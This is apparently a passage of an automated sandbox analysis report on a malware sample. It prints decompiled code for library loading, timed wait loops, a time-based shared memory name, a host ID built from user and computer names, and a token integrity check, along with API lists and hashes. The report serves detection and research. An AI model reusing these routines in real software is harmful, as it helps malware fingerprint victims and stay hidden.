								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x467d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x467d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x467d198; // 0x0
										 *_t102 = _t125;
										 *0x467d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x467d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                                                          0x0467ac64
                                                          0x0467ac7a
                                                          0x0467ac80
                                                          0x0467ac82
                                                          0x0467ac87
                                                          0x0467ac8d
                                                          0x0467ac92
                                                          0x0467ac95
                                                          0x0467aca3
                                                          0x0467acaa
                                                          0x0467acad
                                                          0x0467acb0
                                                          0x0467acb1
                                                          0x0467acb4
                                                          0x0467acb7
                                                          0x0467acba
                                                          0x0467acbf
                                                          0x0467acce
                                                          0x00000000
                                                          0x0467acd4
                                                          0x0467acde
                                                          0x0467ace8
                                                          0x0467aced
                                                          0x0467acef
                                                          0x0467acf9
                                                          0x0467acfc
                                                          0x0467acff
                                                          0x0467ad05
                                                          0x0467ad07
                                                          0x0467ad07
                                                          0x0467ad0a
                                                          0x0467ad0d
                                                          0x0467ad12
                                                          0x0467ad16
                                                          0x0467ad29
                                                          0x0467ad2b
                                                          0x0467add3
                                                          0x0467add3
                                                          0x0467adda
                                                          0x0467addd
                                                          0x0467ade7
                                                          0x0467ade7
                                                          0x0467adeb
                                                          0x0467ae69
                                                          0x0467ae6c
                                                          0x0467ae6e
                                                          0x0467ae6e
                                                          0x0467ae75
                                                          0x0467ae77
                                                          0x0467ae81
                                                          0x0467ae84
                                                          0x0467ae87
                                                          0x0467ae87
                                                          0x00000000
                                                          0x0467aded
                                                          0x0467adf0
                                                          0x0467ae1e
                                                          0x0467ae28
                                                          0x0467ae2c
                                                          0x0467ae34
                                                          0x0467ae37
                                                          0x0467ae3e
                                                          0x0467ae48
                                                          0x0467ae48
                                                          0x0467ae4c
                                                          0x0467ae51
                                                          0x0467ae60
                                                          0x0467ae66
                                                          0x0467ae66
                                                          0x0467ae4c
                                                          0x00000000
                                                          0x0467adf7
                                                          0x0467adfa
                                                          0x0467ae02
                                                          0x0467ae17
                                                          0x0467ae1c
                                                          0x00000000
                                                          0x00000000
                                                          0x0467ae1c
                                                          0x00000000
                                                          0x0467ae02
                                                          0x0467adf0
                                                          0x0467adeb
                                                          0x0467ad31
                                                          0x0467ad38
                                                          0x0467ad48
                                                          0x0467ad4b
                                                          0x0467ad51
                                                          0x0467ad55
                                                          0x0467ad98
                                                          0x0467ada4
                                                          0x0467adcd
                                                          0x0467ada6
                                                          0x0467adaa
                                                          0x0467adb0
                                                          0x0467adb8
                                                          0x0467adba
                                                          0x0467adbd
                                                          0x0467adc3
                                                          0x0467adc5
                                                          0x0467adc5
                                                          0x0467adb8
                                                          0x0467adaa
                                                          0x00000000
                                                          0x0467ada4
                                                          0x0467ad5d
                                                          0x0467ad60
                                                          0x0467ad67
                                                          0x0467ad77
                                                          0x0467ad7a
                                                          0x0467ad8a
                                                          0x00000000
                                                          0x0467ad90
                                                          0x0467ad71
                                                          0x0467ad75
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0467ad75
                                                          0x0467ad42
                                                          0x0467ad46
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0467ad46
                                                          0x0467ad1f
                                                          0x0467ad23
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0467ACCE
                                                          • LoadLibraryA.KERNELBASE(?), ref: 0467AD4B
                                                          • GetLastError.KERNEL32 ref: 0467AD57
                                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0467AD8A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                          • String ID: $
                                                          • API String ID: 948315288-3993045852
                                                          • Opcode ID: da6039a84fed890604a7838a081eb3effd02dbd044428b042ab2dc342804c8e7
                                                          • Instruction ID: 8fc2585fe8e8f29548176cb7e7d475df1f97a6025ceb4a548940abfd741202b5
                                                          • Opcode Fuzzy Hash: da6039a84fed890604a7838a081eb3effd02dbd044428b042ab2dc342804c8e7
                                                          • Instruction Fuzzy Hash: D4811975A00205AFDB25CFA8D884AAEB7F5FF58311F14842AE905E7340FBB4E945CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 046751B0, Relevance: 16.6, APIs: 11, Instructions: 150timememoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 83%
                                                          			E046751B0(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x467d240);
					_v20 = 0;
					_v16 = 0;
					L0467AF2E();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x467d26c; // 0x318
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x467d24c = 5;
						} else {
							_t68 = E04678D14(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x467d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E0467A376(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E046736B1(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x467d244);
							goto L21;
						} else {
							__eflags =  *0x467d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E04676761();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x467d248);
								L21:
								L0467AF2E();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x467d238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                                          0x046751b0
                                                          0x046751c2
                                                          0x046751c5
                                                          0x046751d1
                                                          0x046751d7
                                                          0x046751dc
                                                          0x04675343
                                                          0x046751e2
                                                          0x046751e2
                                                          0x046751e4
                                                          0x046751e9
                                                          0x046751ea
                                                          0x046751f0
                                                          0x046751f3
                                                          0x046751f6
                                                          0x04675204
                                                          0x0467520f
                                                          0x04675212
                                                          0x04675214
                                                          0x04675221
                                                          0x0467522b
                                                          0x0467522d
                                                          0x04675232
                                                          0x04675237
                                                          0x04675242
                                                          0x04675242
                                                          0x04675239
                                                          0x04675239
                                                          0x04675240
                                                          0x00000000
                                                          0x00000000
                                                          0x04675240
                                                          0x0467524c
                                                          0x00000000
                                                          0x0467524f
                                                          0x04675253
                                                          0x0467525e
                                                          0x0467525e
                                                          0x04675265
                                                          0x0467526e
                                                          0x04675275
                                                          0x0467527e
                                                          0x04675281
                                                          0x04675284
                                                          0x04675289
                                                          0x0467528e
                                                          0x00000000
                                                          0x00000000
                                                          0x04675290
                                                          0x04675293
                                                          0x04675296
                                                          0x04675299
                                                          0x00000000
                                                          0x0467529b
                                                          0x046752aa
                                                          0x046752aa
                                                          0x00000000
                                                          0x046752d8
                                                          0x046752d8
                                                          0x046752dd
                                                          0x046752fc
                                                          0x046752fe
                                                          0x04675303
                                                          0x04675304
                                                          0x00000000
                                                          0x046752df
                                                          0x046752df
                                                          0x046752e5
                                                          0x00000000
                                                          0x046752e7
                                                          0x046752e7
                                                          0x046752ec
                                                          0x046752ee
                                                          0x046752f3
                                                          0x046752f4
                                                          0x0467530a
                                                          0x0467530a
                                                          0x04675312
                                                          0x0467531d
                                                          0x04675320
                                                          0x0467532b
                                                          0x0467532d
                                                          0x04675330
                                                          0x04675332
                                                          0x00000000
                                                          0x04675338
                                                          0x00000000
                                                          0x04675338
                                                          0x04675332
                                                          0x046752e5
                                                          0x00000000
                                                          0x046752dd
                                                          0x046752ad
                                                          0x046752af
                                                          0x046752b2
                                                          0x046752b3
                                                          0x046752b3
                                                          0x046752b7
                                                          0x046752c1
                                                          0x046752c1
                                                          0x046752c7
                                                          0x046752ca
                                                          0x046752ca
                                                          0x046752d0
                                                          0x046752d0
                                                          0x0467534d
                                                          0x00000000

                                                          APIs
                                                          • memset.NTDLL ref: 046751C5
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 046751D1
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 046751F6
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 04675212
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0467522B
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 046752C1
                                                          • CloseHandle.KERNEL32(?), ref: 046752D0
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 0467530A
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,04675D5E,?), ref: 04675320
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0467532B
                                                            • Part of subcall function 04678D14: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04AF9368,00000000,?,74B5F710,00000000,74B5F730), ref: 04678D63
                                                            • Part of subcall function 04678D14: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04AF93A0,?,00000000,30314549,00000014,004F0053,04AF935C), ref: 04678E00
                                                            • Part of subcall function 04678D14: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,0467523E), ref: 04678E12
                                                          • GetLastError.KERNEL32 ref: 0467533D
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                          • String ID:
                                                          • API String ID: 3521023985-0
                                                          • Opcode ID: 8783d93e68296b9f4446f1f282f8161b495fedeebd28803abd305a53e96ced0d
                                                          • Instruction ID: 305c78ae3091a547f289ba84d2d7d25427357b42fc7faf56942a8628d89892af
                                                          • Opcode Fuzzy Hash: 8783d93e68296b9f4446f1f282f8161b495fedeebd28803abd305a53e96ced0d
                                                          • Instruction Fuzzy Hash: 99515C71801228BBDF11DF94DC44DEEBFB8EF49720F204655FA21A2290F774AA40CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0467232F, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E0467232F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L0467AF28();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x467d2a8; // 0x47a5a8
				_t5 = _t13 + 0x467e87e; // 0x4af8e26
				_t6 = _t13 + 0x467e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L0467ABCA();
				_t17 = CreateFileMappingW(0xffffffff, 0x467d2ac, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                          0x0467232f
                                                          0x04672337
                                                          0x0467233b
                                                          0x04672341
                                                          0x04672346
                                                          0x0467234b
                                                          0x0467234e
                                                          0x04672351
                                                          0x04672356
                                                          0x04672357
                                                          0x0467235a
                                                          0x0467235f
                                                          0x04672366
                                                          0x04672370
                                                          0x04672372
                                                          0x04672373
                                                          0x04672376
                                                          0x04672392
                                                          0x04672398
                                                          0x0467239c
                                                          0x046723ea
                                                          0x0467239e
                                                          0x046723ab
                                                          0x046723bb
                                                          0x046723c3
                                                          0x046723d5
                                                          0x046723d9
                                                          0x00000000
                                                          0x00000000
                                                          0x046723c5
                                                          0x046723c8
                                                          0x046723cd
                                                          0x046723cf
                                                          0x046723cf
                                                          0x046723ad
                                                          0x046723af
                                                          0x046723db
                                                          0x046723dc
                                                          0x046723dc
                                                          0x046723ab
                                                          0x046723f1

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,04675C31,?,?,4D283A53,?,?), ref: 0467233B
                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04672351
                                                          • _snwprintf.NTDLL ref: 04672376
                                                          • CreateFileMappingW.KERNELBASE(000000FF,0467D2AC,00000004,00000000,00001000,?), ref: 04672392
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04675C31,?,?,4D283A53), ref: 046723A4
                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 046723BB
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04675C31,?,?), ref: 046723DC
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04675C31,?,?,4D283A53), ref: 046723E4
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1814172918-0
                                                          • Opcode ID: 0bd778a7a2c7da1f5aa4856d7b5ea3a29852bc04fdf796cf9c36839e7aa684d3
                                                          • Instruction ID: 9753c632d5dcfefc02d03c5497b73663004b6f9f43d65f88a4b565cd620ba6fa
                                                          • Opcode Fuzzy Hash: 0bd778a7a2c7da1f5aa4856d7b5ea3a29852bc04fdf796cf9c36839e7aa684d3
                                                          • Instruction Fuzzy Hash: D021E172A00204BBD715EFA4DC45F8E37A9EB88720F200165FA09E72C0FA75ED49CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04679135, Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 96%
                                                          			E04679135(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x467d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E0467A6CC( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x467d2a4 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x467d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E04677306(_v8 + _v8, _t64);
							}
							HeapFree( *0x467d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x467d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04677306(_v8 + _v8, _t64);
						}
						HeapFree( *0x467d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                                          0x04679135
                                                          0x0467913d
                                                          0x04679141
                                                          0x04679144
                                                          0x04679149
                                                          0x0467914b
                                                          0x04679150
                                                          0x04679150
                                                          0x04679156
                                                          0x04679158
                                                          0x04679165
                                                          0x046791c6
                                                          0x04679167
                                                          0x0467916c
                                                          0x04679172
                                                          0x04679177
                                                          0x04679185
                                                          0x04679189
                                                          0x04679198
                                                          0x0467919f
                                                          0x046791a6
                                                          0x046791a6
                                                          0x046791b1
                                                          0x046791b1
                                                          0x04679189
                                                          0x04679177
                                                          0x046791c8
                                                          0x046791ce
                                                          0x046791d8
                                                          0x046791da
                                                          0x046791df
                                                          0x046791ee
                                                          0x046791f2
                                                          0x046791fd
                                                          0x04679204
                                                          0x0467920b
                                                          0x0467920b
                                                          0x04679217
                                                          0x04679217
                                                          0x046791f2
                                                          0x04679222
                                                          0x04679224
                                                          0x04679227
                                                          0x04679229
                                                          0x0467922c
                                                          0x0467922f
                                                          0x04679239
                                                          0x0467923d
                                                          0x04679241

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0467916C
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04679183
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04679190
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04675D20), ref: 046791B1
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 046791D8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 046791EC
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 046791F9
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04675D20), ref: 04679217
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                          • String ID:
                                                          • API String ID: 3239747167-0
                                                          • Opcode ID: 3a4bc7364f7f1b1f475a14c0815662e02d86dc38bf6ccd3b02c06247d45efdaa
                                                          • Instruction ID: f9c97f9fa13f16700e37bc6370f746899a82343fd72e38151fd1038ddb8ce1e7
                                                          • Opcode Fuzzy Hash: 3a4bc7364f7f1b1f475a14c0815662e02d86dc38bf6ccd3b02c06247d45efdaa
                                                          • Instruction Fuzzy Hash: 7E3139B1A00209EFEB14DFA8DC80AAEB7F9EF54344B114469E614D7250FB34EE169B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04671A08, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04671A08(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x467d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E0467A71F(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E0467A734(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                          0x04671a15
                                                          0x04671a1c
                                                          0x04671a23
                                                          0x04671a37
                                                          0x04671a42
                                                          0x04671a5a
                                                          0x04671a67
                                                          0x04671a6a
                                                          0x04671a6f
                                                          0x04671a7a
                                                          0x04671a7e
                                                          0x04671a8d
                                                          0x04671a91
                                                          0x04671aad
                                                          0x04671aad
                                                          0x04671ab1
                                                          0x04671ab1
                                                          0x04671ab6
                                                          0x04671aba
                                                          0x04671ac0
                                                          0x04671ac1
                                                          0x04671ac8
                                                          0x04671ace

                                                          APIs
                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04671A3A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04671A5A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04671A6A
                                                          • CloseHandle.KERNEL32(00000000), ref: 04671ABA
                                                            • Part of subcall function 0467A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04675595), ref: 0467A72B
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04671A8D
                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04671A95
                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04671AA5
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                          • String ID:
                                                          • API String ID: 1295030180-0
                                                          • Opcode ID: 769a8855fec8cdfffcef207b4c4f272520260e1c4855e43fee6a3ad1565c7471
                                                          • Instruction ID: 7de1adba56f33d5a3677665925ddefe6d9317bcb44d908caf2cff56de2526523
                                                          • Opcode Fuzzy Hash: 769a8855fec8cdfffcef207b4c4f272520260e1c4855e43fee6a3ad1565c7471
                                                          • Instruction Fuzzy Hash: E9213C7590024DFFEB10DFA4DC84EEEBBB9EF45304F1001A6EA11A6290E7759E45DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0467391F, Relevance: 9.2, APIs: 6, Instructions: 154memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(?), ref: 0467395A
                                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 046739DD
                                                          • StrStrIW.SHLWAPI(00000000,006E0069), ref: 04673A1D
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04673A3F
                                                            • Part of subcall function 04676F3A: SysAllocString.OLEAUT32(0467C290), ref: 04676F8A
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 04673A92
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04673AA1
                                                            • Part of subcall function 04671AE2: Sleep.KERNELBASE(000001F4), ref: 04671B2A
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                          • String ID:
                                                          • API String ID: 2118684380-0
                                                          • Opcode ID: e63f1e069a7f71a39611f74cc8cb07cf29f842da86726d5da510a34c983dd97b
                                                          • Instruction ID: 3d561a28f9ae9fc00749599fe70b7eb40a438d0ad1d3c58946d4fe57c3a812b0
                                                          • Opcode Fuzzy Hash: e63f1e069a7f71a39611f74cc8cb07cf29f842da86726d5da510a34c983dd97b
                                                          • Instruction Fuzzy Hash: B5514C76500609AFDB01CFA8C844ADEB7B6FF98744F248869E905DB320EB35ED45CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

